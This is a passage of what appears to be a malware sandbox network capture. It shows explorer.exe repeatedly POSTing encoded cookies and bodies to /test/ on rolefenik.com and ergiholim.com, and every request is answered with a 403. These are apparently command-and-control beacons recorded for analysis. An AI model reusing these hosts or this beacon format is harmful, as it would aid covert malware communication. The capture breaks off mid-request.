                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071ff4dd42cc2-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1634&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=1754088&cwnd=237&unsent_bytes=0&cid=80d1d0944f5e918d&ts=493&x=0"
                                                                                                                                          2024-11-13 17:22:41 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:41 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          43 | 192.168.2.6 | 50036 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:42 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:42 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:43 UTC | 744 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:43 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Icly1E73rBXSNTUncto87nreNkMCmzxbo3fAnS6bkdah65AWJdp3pOif6rSeVodUd78RNEp4jcxjHfBCH%2FtkF0UBiqgxXDA0jvn8Fr7KrscghBUjNlchEHJPMNM2r5Pi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072085ba2e367-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=152031&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=18114&cwnd=32&unsent_bytes=0&cid=22fa5661142b8342&ts=744&x=0"
                                                                                                                                          2024-11-13 17:22:43 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:43 UTC | 5 | IN | Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          44 | 192.168.2.6 | 50037 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:44 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:44 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:44 UTC | 758 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlGxf%2BGx%2FDm7xhKQsFSkoDUs6HHfZCHK%2BAYx7K9xEnJKoTmMtSXq%2BzJnRwG1wbdDxVPyKnpdD6gov5mv5aZx%2F%2B1q%2F6AMdEZga08auoxynq8nhWRKfcRYIRLwy3sn9y%2F1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207213696650d8-BOD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=114495&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=25300&cwnd=32&unsent_bytes=0&cid=020e660828833674&ts=525&x=0"
2024-11-13 17:22:44 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 50038 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:45 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:45 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:46 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:46 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8irEKmTOZqI9GT1%2Fi4ivCm1%2FktY1QM9j4E058tFjJ0meN69YUCrFbVXJ%2FFKaBb1aYaJKnm2Gsyzy5E0zTukDsKaagc6WoDNnu2tWqXD09KBYnigAheRaAnsFRVb2Ff2y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20721b88ea685a-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=171015&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20061&cwnd=32&unsent_bytes=0&cid=7a1ede1f5e5229a1&ts=793&x=0"
2024-11-13 17:22:46 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 50039 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:47 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:47 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:47 UTC | 743 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:47 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OHaq2CNWANcNurjJGs9Ja4p6dtRPGMa5spfj5lRTwUJyuz71DOdOo6HeirIlMkjM3PKe1s9CqosLR0VE8DdQkonFPMKZGIjQOc9kknnfw0viXYPA%2BZXfjCVvlkQHeMia"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072248c38fa05-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41184&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=70223&cwnd=32&unsent_bytes=0&cid=0e647d344df4be39&ts=494&x=0"
2024-11-13 17:22:47 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 50040 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:48 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:48 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:48 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:48 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2UylY2yyLd8krg4QAWQA7%2FMpDEEDflZiGfmWW2%2FUGhAsHGoDq0kxc4N8Y6sMvVX8J42CceKjFqTF5%2Fy6nLzUK2mSMFfwmYHkYYsN7rarGwUlDNFUZCjC0C3w03AelW6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20722c09d3c997-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=38217&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=75835&cwnd=32&unsent_bytes=0&cid=fac6eaae224df6ed&ts=378&x=0"
2024-11-13 17:22:48 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 50041 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:49 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:49 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:50 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyUeVC7pn%2BgIuEr6wGwsbUPMkVimrai8OwfULubgUOjsW13vRpxADbw2DUgMQcaVovQdwKkBdGR%2Fqmkh5dt83t8UWvd%2BdAPonVy3KT423bou1ZDM%2FOa8R%2FCVn4nrHdB3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072346d842089-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=158042&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=20104&cwnd=32&unsent_bytes=0&cid=37b8b5597b73db18&ts=826&x=0"
2024-11-13 17:22:50 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.6 | 50042 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:51 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:51 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:51 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:51 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1D%2B2uFAu8wuBJoGf8cRuydwJSBoEZK%2BfqDJsqohKH%2BtBflxiouudMXTOXtKuBeulOwApCadRnzy9AUwEbhRI5T4Dph6imPDsooD1kCVYsoPqsCRLct5Dw8uQiCWcCwH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20723f7ccfd773-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=149219&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18709&cwnd=32&unsent_bytes=0&cid=9e747e29bab49cac&ts=533&x=0"
2024-11-13 17:22:51 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Ch
2024-11-13 17:22:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 50043 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:52 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:52 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:52 UTC | 749 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:52 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=00Cl7wKBZ7yV9cbh0d4dK5aSn4k9yT1wMhtcNQ7RqPFHdpq9f9Ahf%2FdZH1bUTbutbKDy3nFHEnSIHcQ%2FFl1STYfj5O39yCLkrTb4SKd6Rw%2Fr0GLwMvrgOe0DBVXR3Wz1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207246286f2c86-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1512&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2023759&cwnd=235&unsent_bytes=0&cid=330b978d0d1a4d06&ts=309&x=0"
2024-11-13 17:22:52 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Ch
2024-11-13 17:22:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 50044 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:53 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:53 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:54 UTC | 746 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:54 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cIsHCbJE1VTrBXvCfTIouycG0j8PfXHS8JKqwP5QVmLktwEth5RAJUIcUJKCpomc%2Bd0yLm7xrI6XzMXVyfKDIUx%2FUGD0ZXYoYuOf09XFVDay3AdeFLOrf13bHMQYbhA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20724ebc837372-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=166823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=14790&cwnd=32&unsent_bytes=0&cid=00d9681dae08b3b4&ts=582&x=0"
2024-11-13 17:22:54 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Ch
2024-11-13 17:22:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 50045 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:55 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:55 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:56 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:56 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=monfumrc7VHXqkomkrIvIZe%2FRHjcZyB2TZSs9dS43RiCxTOCNj8VRp1LzP8Txlrlgln01y%2BzU8BYDpgHBmgMsqh470SpVZSr3iC02G0nUV9nnBJKXDTHC2GK9FpzC410"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072578bd8d761-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21049&cwnd=32&unsent_bytes=0&cid=e53bcc705fcab88e&ts=1241&x=0"
2024-11-13 17:22:56 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Ch
2024-11-13 17:22:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.6 | 50046 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:57 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
